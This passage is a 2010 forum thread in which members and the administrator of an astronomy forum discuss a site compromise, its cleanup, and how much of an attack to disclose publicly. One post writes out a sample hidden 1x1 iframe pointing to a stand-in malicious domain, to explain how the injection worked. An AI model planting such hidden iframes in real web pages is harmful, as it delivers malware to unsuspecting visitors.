The problem is being caused by JS:Prontexi (http://www.njnnetwork.com/njn/2010/03/new-facebook-and-advertising-virus-threats/#more-35477) which targets Windows machines and appears to set off all sorts of bogus alarms in the anti-virus software. It looks like it infects the sites through the ads and does not require a user to even mouse click to be infected.

Jeff Root
2010-Apr-05, 05:42 AM
If Google is the entity claiming that BAUT is BAD and Google is also the
entity which provided the AD that infected BAUT....

-- Jeff, in Minneapolis

TheHalcyonYear
2010-Apr-05, 06:36 AM
If Google is the entity claiming that BAUT is BAD and Google is also the
entity which provided the AD that infected BAUT....

-- Jeff, in Minneapolis
Yeah, it's gunna make this a bit weird before it's all straightened out. It does look, though, like this virus may not be very harmful; just a lotta bogus warnings from AV software. What worries me is that the payload be a lot more destructive the next time someone launches one of these.


Edit to Add:

Though, I gotta add: If I was Fraser, I'd be having a nice long talk with Google right about now; getting people out of bed if need be.

PraedSt
2010-Apr-05, 07:10 AM
I've stopped getting the warnings.

TheHalcyonYear
2010-Apr-05, 07:16 AM
Me too. As of about an hour ago, everything seems back to normal. I think Fraser got things straightened out. What does one then say to someone who infects your site then tells everyone to stay away because your site is infected??

Oh to be a fly on the wall; a ghost in the back of the room.

JohnD
2010-Apr-05, 11:25 AM
The problem is being caused by JS:Prontexi (http://www.njnnetwork.com/njn/2010/03/new-facebook-and-advertising-virus-threats/#more-35477) which targets Windows machines and appears to set off all sorts of bogus alarms in the anti-virus software. It looks like it infects the sites through the ads and does not require a user to even mouse click to be infected.

Must be an echo in here. See post 90.
John

TheHalcyonYear
2010-Apr-05, 04:31 PM
Must be an echo in here. See post 90.
John
Thanks but no thanks.

Argos
2010-Apr-05, 05:48 PM
When I visited today I got a Firefox red warning page saying that it was a reported attack site. I chose to ignore the warning, but I'm wondering if we're still having security issues?
EDIT:
So basically, we're not being hacked or anything, yet Google's listing us as suspicious? How does that work out?

Itīs just an IFRAME exploit. A low tech, script kiddies kind of thing. Not a concern for those who can disable redirecting. Typically, all index files in the filesystem are appended with a couple of lines. In order to getting rid of it, all index pages in all directories must be replaced by clean ones. Itīs a result of weak/stolen FTP password.

chrissy
2010-Apr-05, 05:59 PM
It's things like Avast which are checking the site in real time which are very useful in this situation. So if that warning pops up again, please let me know.

Not a problem at all.

slang
2010-Apr-05, 06:50 PM
Itīs a result of weak/stolen FTP password.

It can be. There are many other ways to corrupt a system, automated or not. I have not seen any indication that bad passwords played a role on this occasion.

IMHO this isn't the place to speculate. Address possible security concerns to Fraser directly, or to one of the admins.

Swift
2010-Apr-05, 06:57 PM
It can be. There are many other ways to corrupt a system, automated or not. I have not seen any indication that bad passwords played a role on this occasion, and IMHO this isn't the place to speculate. Address possible security concerns to Fraser directly, or to one of the admins.
Speculate all you like. Just don't expect confirmations on any of the speculations. ;)

Argos
2010-Apr-05, 07:05 PM
It can be. There are many other ways to corrupt a system, automated or not. I have not seen any indication that bad passwords played a role on this occasion, and IMHO this isn't the place to speculate. Address possible security concerns to Fraser directly, or to one of the admins.

Iīm not a speculator. Iīm an engineer. Donīt use this tone to refer to me as Iīve never used of disrespect when talking to you.

Swift
2010-Apr-05, 07:11 PM
Chill everyone. I detected no disrespect, and even if there was, "eye-for-an-eye" comments will leave everyone blind (or at least infracted).

Argos
2010-Apr-05, 07:33 PM
No strong feelings here. Discussing security openly itīs the best way to deal with problems. It can help people [and I mean the general public that frequent here] avoid committing the same mistakes over and over again. It is positive to the Internet environment. I donīt think my opinion has compromised BAUTīs security in any way.

Siguy
2010-Apr-05, 07:55 PM
Has it cleared up? I'm no longer getting warning messages.

Argos
2010-Apr-05, 08:04 PM
Yes, apparently. As I said previously, IFRAME attacks compromise all index pages in the serverīs file system. All of them must be cleaned up. Apparently Fraserīs done that.

Fraser
2010-Apr-05, 09:34 PM
I'm not sure what the original exploit was, but I think it was either some kind of SQL injection into an insecure part of the site (or a cross-side server attack), which changed one of the administrator email addresses. From there the exploiter was able to change the password, and then put code into the templates. They also somehow loaded PHP files into various directories. It's also possible that the hacker cracked one of the administrator passwords, revised a template and used that to bootstrap in their code.

My fix was set up a brand new server on Rackspace (a much more secure environment that prevents SSH), and then install the forum from scratch from non-compromised files that I downloaded directly from vBulletin. I also changed all the administrator passwords to very secure passwords. I also reverted the templates to their default settings, which is why we don't have the Google search, advertisements, etc. Once everything was working, I uploaded all the image files to make the attachments and avatars work.

I didn't realize that there were some hacker code files in some of those attachment directories, so the hacker (bot?) was able to bootstrap in and hack our templates again. That was the hack that we saw yesterday.

I wiped out all the hacker files, changed the admin passwords again, and now we're waiting for Google, etc to remove the virus warnings.

Jeff Root
2010-Apr-05, 09:34 PM
Itīs just an IFRAME exploit. A low tech, script kiddies kind of thing.
Not a concern for those who can disable redirecting. Typically, all
index files in the filesystem are appended with a couple of lines.
In order to get rid of it, all index pages in all directories must be
replaced by clean ones. Itīs a result of weak/stolen FTP password.
I understand almost none of that.

I see that IFRAME is an HTML tag which displays one web page
inside another. The tag specifies the page to be imported.
How does a script exploit this?

You imply that the exploit replaces the content of the IFRAME tag so
that it links to a page other than the one it should link to, and that
this is "redirecting". How does a user or the user's software become
aware that a link is redirected in order to prevent that redirection?

What is an "index file" in this context? Is it what NTFS or FAT uses
to locate files on a hard drive? (I'm more familiar with FAT.) If so,
how does the exploit get write access to them?

What sort of "lines" would be appended to those files?

Is replacing altered "index pages" a matter of removing the appended
lines, or of replacing them from backups, or what?

Whose password is stolen? Where is it stolen from? Who or what
steals it? Where is the stolen password used? It isn't apparent
what a stolen password has to do with the IFRAME redirection or
lines appended to index files.

-- Jeff, in Minneapolis

Fraser
2010-Apr-05, 09:42 PM
Whose password is stolen? Where is it stolen from? Who or what
steals it? Where is the stolen password used? It isn't apparent
what a stolen password has to do with the IFRAME redirection or
lines appended to index files.

-- Jeff, in Minneapolis

One of the administrator passwords was stolen. Not really stolen, but changed, so that the hacker could pretend to be an administrator and update the website templates. Installing the IFRAME was the prize, like breaking into a bank to steal money. Once the IFRAME was on the site, it could be used to install Trojan viruses on visitors to BAUT who are using old, insecure computers and browsers.

slang
2010-Apr-05, 10:20 PM
Iīm not a speculator. Iīm an engineer. Donīt use this tone to refer to me as Iīve never used of disrespect when talking to you.

I'm not sure what tone you mean, there was certainly no disrespect intended. I do see that I should have made clear which part of my response was to you, and which part was more in general (and I edited my post accordingly). In your response I took exception to what (perhaps wrongly) seemed to me an insinuation that an easily guessed or stolen FTP password was the cause of all this, implicitly blaming site owners, while there was (to my knowledge) no evidence of that, and plenty other possible attack vectors.


No strong feelings here. Discussing security openly itīs the best way to deal with problems. It can help people [and I mean the general public that frequent here] avoid committing the same mistakes over and over again. It is positive to the Internet environment.

Nor here, just bad communication on my part. Past mistakes, yes. I meant current, actual security issues. Openness is great, but if something seems wrong or dangerous, one should give admins a chance to fix before publishing. IMHO it just wouldn't do to post here something like "hey, if you use exploit X at website Y, and do Z, you can gain file or db access here". That should be something communicated more privately.


I donīt think my opinion has compromised BAUTīs security in any way.

Nor do I, and I apologize for wrongly giving the impression that I might think that.

Argos
2010-Apr-05, 10:27 PM
I understand almost none of that.

I see that IFRAME is an HTML tag which displays one web page
inside another. The tag specifies the page to be imported.
How does a script exploit this?

You imply that the exploit replaces the content of the IFRAME tag so
that it links to a page other than the one it should link to, and that
this is "redirecting".

Jeff, you seem to have a pretty good understanding. Youīre right.


How does a user or the user's software become
aware that a link is redirected in order to prevent that redirection?

A malicious IFRAME has only 1 pixel square. Most anti-viruses trigger an alarm when the IFRAME attempts downloading the threat.


What is an "index file" in this context? Is it what NTFS or FAT uses
to locate files on a hard drive?

Index files, in this context, are the main files on web server directories [or file system, or directory tree]. Generally there are index.html files in all folders of a domainīs file system, and the index file in the domainīs root gives you access to a website. Developers use empty index.html files in directories other than root to prevent directory browsing. The contents of a directory - or folder - would be visible if those empty files are not provided.


If so, how does the exploit get write access to them?

As explained by Fraser.


What sort of "lines" would be appended to those files?

The IFRAME lines. Like these:
<iframe src ="evildomain.ru" width="1" height="1">
<p>Your browser does not support iframes.</p>
</iframe>


Is replacing altered "index pages" a matter of removing the appended
lines, or of replacing them from backups, or what?

Replacing from backups is always better/easier, like Fraser did.

I think Fraser already addressed the rest.

TheHalcyonYear
2010-Apr-05, 10:28 PM
Nor here, just bad communication on my part. Past mistakes, yes. I meant current, actual security issues. Openness is great, but if something seems wrong or dangerous, one should give admins a chance to fix before publishing. IMHO it just wouldn't do to post here something like "hey, if you use exploit X at website Y, and do Z, you can gain file or db access here". That should be something communicated more privately.

I disagree with this. I think open discussion of these issues is important. I think that it was even more in this case since there was the danger that poster's systems had been infected. I have concern for the admins and their problems, but I also think that full disclosure as quickly and completely as possible is the best way.

Argos
2010-Apr-05, 10:29 PM
Nor do I, and I apologize for wrongly giving the impression that I might think that.

OK. NO problem at all. Lets forget the misinterpretation. Still friends? :)

slang
2010-Apr-05, 10:40 PM
I disagree with this. I think open discussion of these issues is important. I think that it was even more in this case since there was the danger that poster's systems had been infected. I have concern for the admins and their problems, but I also think that full disclosure as quickly and completely as possible is the best way.

Only to the point of where the information helps posters or site visitors. Knowing exactly how a website might be, or has been, corrupted, is of no immediate help to visitors of that site. What was subsequently done to (attempt to) infect others is something else. These are two very different things, with different consequences, and different approaches to best results.


OK. NO problem at all. Lets forget the misinterpretation. Still friends? :)

*throws a cold beer* (If you don't drink, trade it for something better)

HenrikOlsen
2010-Apr-05, 10:45 PM
Iīm not a speculator. Iīm an engineer. Donīt use this tone to refer to me as Iīve never used of disrespect when talking to you.
You did speculate (and to some extend disrespect) when you made the supposition of a weak password.

Reading between the lines of Fraser's posts it looks rather like it was a weakness in the vBulletin code that was exploited to alter the files, this was one of the reasons for rushing the update.

HenrikOlsen
2010-Apr-05, 10:55 PM
Nor here, just bad communication on my part. Past mistakes, yes. I meant current, actual security issues. Openness is great, but if something seems wrong or dangerous, one should give admins a chance to fix before publishing. IMHO it just wouldn't do to post here something like "hey, if you use exploit X at website Y, and do Z, you can gain file or db access here". That should be something communicated more privately.
I disagree with this. I think open discussion of these issues is important. I think that it was even more in this case since there was the danger that poster's systems had been infected. I have concern for the admins and their problems, but I also think that full disclosure as quickly and completely as possible is the best way.
There are both good and bad ways of doing full disclosure, and in my many years as programmer and sysadmin I've seen most of them.

For instance, when a weakness in a program has been found that allows people to abuse it, there are several ways to react:
A good way is to describe the weakness in vague terms and a quick fix/workaround in precise terms, and provide details of the exploit specifically to those developing the software for patching, as that gives the required information to the right people and more importantly doesn't give too much info to the blackhats.
A very bad way is to publish a detailed exploit, and go "Now they will have to fix it."
For some reason it's the latter who tends to defend their action as full disclosure and I have seen examples of that behavior.

Another way to express this is: Are you going to pay for the work wasted because someone posted an exploit Saturday and gave the script kiddies 2 days to destroy things before the admins got to work Monday and had a chance to read security bulletins?
Since you're demanding full disclosure, you should be willing to take responsibility for the consequences of your demand.

In this case we've had "full enough" disclosure.
Someone managed to get access (how is irrelevant for the members) to alter the files on the server so some of the pages made the users' browsers try to fetch malware.
Which malware is difficult to say, as different antivirus programs use different names for them and since it's fetched from another site and may even be rotating between multiple types it can't be reliably recorded and reported.

What more do you want to know?

Argos
2010-Apr-05, 11:02 PM
A good way is to describe the weakness in vague terms and a quick fix/workaround in precise terms, and provide details of the exploit specifically to those developing the software for patching, as that gives the required information to the right people and more importantly doesn't give too much info to the blackhats.

I doubt a real blackhat can learn something here that he doesnīt already know...

slang
2010-Apr-05, 11:14 PM
I doubt a real blackhat can learn something here that he doesnīt already know...

Perhaps not, but the grey hats.. they'll pounce on any opportunity to cause mayhem. Fear the greys (a little)!

HenrikOlsen
2010-Apr-05, 11:21 PM
I doubt a real blackhat can learn something here that he doesnīt already know...
So do I. I was really responding to THY's demand for "full disclosure" in a reply to a description of someone posting an exploit. I've edited my post to include the quote THY was responding to to make that clearer

A too detailed explanation of how our files got altered might however tell a script kiddie enough to attack another site still using the previous version of vBulletin.

Jeff Root
2010-Apr-05, 11:51 PM
That looked like a pretty good explanation of what happened.

For anyone using a susceptable browser, if the exploit had remained in place
undetected, what would have happened on their computer?

(I've had scripting turned off *most* of the time for the last two or three months
just to avoid the ads here on BAUT. For a short time I mistakenly thought disabling
Active X and disabling cookies from the advertising websites would be enough,
but apparently I turned off scripting at the same time I made the other changes,
and it was what did the job.)

-- Jeff, in Minneapolis

TheHalcyonYear
2010-Apr-06, 02:00 AM
So do I. I was really responding to THY's demand for "full disclosure" in a reply to a description of someone posting an exploit. I've edited my post to include the quote THY was responding to to make that clearer

A too detailed explanation of how our files got altered might however tell a script kiddie enough to attack another site still using the previous version of vBulletin.
I'm not asking administrators to reveal anything about how the site or servers are structured. i am suggesting that whatever posters might find out should not be suppressed. It's like saying that the information about making a bomb should be suppressed. Anything I might post is almost certainly in the hands of a bomb-maker.

mugaliens
2010-Apr-06, 02:09 AM
I'm not asking administrators to reveal anything about how the site or servers are structured. i am suggesting that whatever posters might find out should not be suppressed. It's like saying that the information about making a bomb should be suppressed. Anything I might post is almost certainly in the hands of a bomb-maker.

This is undoubtedly true for an experienced bomb-maker, but it's not true for those just getting into it. Bomb-making techniques are not commonly in the hands of a juvenile delinquint would otherwise be unable to hurt himself or others with a bomb that perhaps goes off prematurely or during manufacture.

I concur with Henrik's detailed assessment and approach (http://www.bautforum.com/showthread.php/102548-Forum-access-and-security-problems-2010?p=1712303#post1712303)he provides in post #152.

TheHalcyonYear
2010-Apr-06, 02:33 AM
This is undoubtedly true for an experienced bomb-maker, but it's not true for those just getting into it. Bomb-making techniques are not commonly in the hands of a juvenile delinquint would otherwise be unable to hurt himself or others with a bomb that perhaps goes off prematurely or during manufacture.

I concur with Henrik's detailed assessment and approach (http://www.bautforum.com/showthread.php/102548-Forum-access-and-security-problems-2010?p=1712303#post1712303)he provides in post #152.
Good for you, I obviously disagree.

Fraser
2010-Apr-06, 02:48 AM
I'm happy to yack on and on about it, I don't really mind if you want all the gory details. But there isn't much more I really know. Performing security forensics is one of the most highly skilled tasks a system administrator can do.

How did the hacker get in? I don't honestly know. I didn't leave a careful crime scene for further analysis. I assumed that the hacker took one of the common attack vectors that hackers always take. And then I nuked the site from orbit.

1. They could have hacked an admin password. So we changed all the admin passwords and made sure they're ridiculously long with bizarre characters in them.
2. They might have exploited a weakness in the server or operating system, or used a different website on the server to make an attack. I set up a brand new server in a much more secure server environment; one which doesn't even give me root access or SSH (you admins know how much of a sacrifice that is).
3. They might have exploited an insecure part of vBulletin. I installed a completely fresh version of vBulletin 4, which is likely to have all the latest security upgrades. I also installed it fresh onto a new server.

My mistake when copying over the image files (so we can see our custom avatars, and attachments) was to include one of the hacker's scripts, which could then be used to attack the server again. But I've cleaned that up.

TheHalcyonYear
2010-Apr-06, 04:52 AM
Thanks Fraser,

Your honesty is much appreciated.

THY

slang
2010-Apr-06, 07:36 AM
one which doesn't even give me root access or SSH (you admins know how much of a sacrifice that is).

The term "masochist" comes to mind :) But it does explain why some other stuff takes more time to fix than hoped for.

Jeff Root
2010-Apr-06, 11:14 AM
My mistake when copying over the image files (so we can see our
custom avatars, and attachments) was to include one of the hacker's
scripts, which could then be used to attack the server again.
I take it that you identified the script.

Is there any idea when the system was first attacked? I'm interested in
getting a CD or DVD from you of the system as it was before the attack,
although I presume that I'd have to buy the vBulletin software to view it,
which might be cost prohibitive. I gather that it is commercial software.
I wonder if they sell licenses for individual use....

-- Jeff, in Minneapolis

ToSeek
2010-Apr-06, 09:39 PM
I'm happy to yack on and on about it, I don't really mind if you want all the gory details. But there isn't much more I really know. Performing security forensics is one of the most highly skilled tasks a system administrator can do.

Some of my colleagues here at Goddard do security forensics as their full-time job. It's not trivial.

slang
2010-Apr-06, 10:18 PM
Some of my colleagues here at Goddard do security forensics as their full-time job. It's not trivial.

I applied for a job doing digital forensics. In addition to what I already knew, I learned a lot doing research to be prepared for a possible interview (that sadly never happened, others had experience with relevant software). I wholeheartedly agree it is most certainly not trivial. A fun website (for those interested, anyway) to spend hours and hours and hours on would be http://www.honeynet.org/ and the challenges there.

crosscountry
2010-Apr-07, 02:14 AM
One of the administrator passwords was stolen. Not really stolen, but changed, so that the hacker could pretend to be an administrator and update the website templates. Installing the IFRAME was the prize, like breaking into a bank to steal money. Once the IFRAME was on the site, it could be used to install Trojan viruses on visitors to BAUT who are using old, insecure computers and browsers.

is this at all related to someone using a name just like an admin? ToSeek posted something about that a short while back.

J Riff
2010-Apr-07, 10:38 PM
I was in and out a few times during this, and no problems at all. I had just run a fully updated version of spybot, tho I have no idea if that's why I didn't notice anything untoward.

HenrikOlsen
2010-Apr-08, 09:02 AM
I was in and out a few times during this, and no problems at all. I had just run a fully updated version of spybot, tho I have no idea if that's why I didn't notice anything untoward.
Because Spybot isn't the relevant program to notice what happened, it's very unlikely to have had any effect.
Which antivirus program do you use?